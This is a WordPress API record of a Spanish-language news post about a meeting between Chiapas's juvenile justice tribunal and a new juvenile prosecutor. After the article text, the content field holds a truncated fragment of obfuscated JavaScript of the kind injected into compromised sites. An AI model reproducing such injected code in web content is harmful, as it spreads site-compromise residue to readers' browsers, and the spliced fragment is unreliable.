{"id":3052,"date":"2022-06-21T00:24:08","date_gmt":"2022-06-21T00:24:08","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3052"},"modified":"2022-06-21T00:24:09","modified_gmt":"2022-06-21T00:24:09","slug":"se-reune-tribunal-de-adolescentes-del-poder-judicial-con-nuevo-fiscal-especializado","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3052","title":{"rendered":"Se re\u00fane Tribunal de Adolescentes del Poder Judicial con Nuevo Fiscal Especializado"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"498\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-18-at-2.04.05-PM-1024x498.jpeg\" alt=\"\" class=\"wp-image-3053\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-18-at-2.04.05-PM-1024x498.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-18-at-2.04.05-PM-300x146.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-18-at-2.04.05-PM-768x373.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-18-at-2.04.05-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>20 de Junio del 2022. El Tribunal de Alzada Especializada en Justicia para Adolescentes del Poder Judicial del Estado de Chiapas, llev\u00f3 a cabo una reuni\u00f3n de trabajo convocada por el reci\u00e9n nombrado fiscal de Adolescentes, Jos\u00e9 Eduardo Morales Montes.La magistrada presidenta del Tribunal Especializado, Mirna Lucrecia Camacho Pedrero, recibi\u00f3 en las instalaciones de Berrioz\u00e1bal, al fiscal Morales Montes, en un acercamiento institucional para fortalecer la comunicaci\u00f3n y el trabajo coordinado entre los \u00f3rganos especializados en justicia para adolescentes, con la finalidad de continuar por la v\u00eda de la reintegraci\u00f3n y el mejoramiento de la calidad de vida de las ni\u00f1as, ni\u00f1os y adolescentes de las diversas regiones de la entidad.En esta reuni\u00f3n estuvieron presentes la magistrada ponencia A, del Tribunal Especializado en Justicia Para Adolescentes, Maria Elena Ramos Gordillo; el secretario general de acuerdos en funciones de magistrado, Francisco Mijangos Nucamendi y la jueza de Control Especializada en Justicia Penal para Adolescentes en Berrioz\u00e1bal, Amanda Farf\u00e1n Ruiz.Estas acciones, ponen de manifiesto el compromiso institucional del Poder Judicial del Estado de Chiapas, que encabeza el magistrado presidente Juan \u00d3scar Trinidad Palacios, para que desde la respetuosa colaboraci\u00f3n entre los Poderes del estado, se pondere el inter\u00e9s superior de la ni\u00f1ez y adolescencia que enfrentan procesos penales, en beneficio de toda la sociedad chiapaneca.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>20 de Junio del 2022. El Tribunal de Alzada Especializada en Justicia para Adolescentes del Poder Judicial del Estado de Chiapas, llev\u00f3 a cabo una reuni\u00f3n de trabajo convocada por el reci\u00e9n nombrado fiscal de Adolescentes, Jos\u00e9 Eduardo Morales Montes.La magistrada presidenta del Tribunal Especializado, Mirna Lucrecia Camacho Pedrero, recibi\u00f3 en las instalaciones de Berrioz\u00e1bal, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3053,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3052","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3052","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3052"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3052\/revisions"}],"predecessor-version":[{"id":3054,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3052\/revisions\/3054"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3053"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3052"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3052"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3052"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}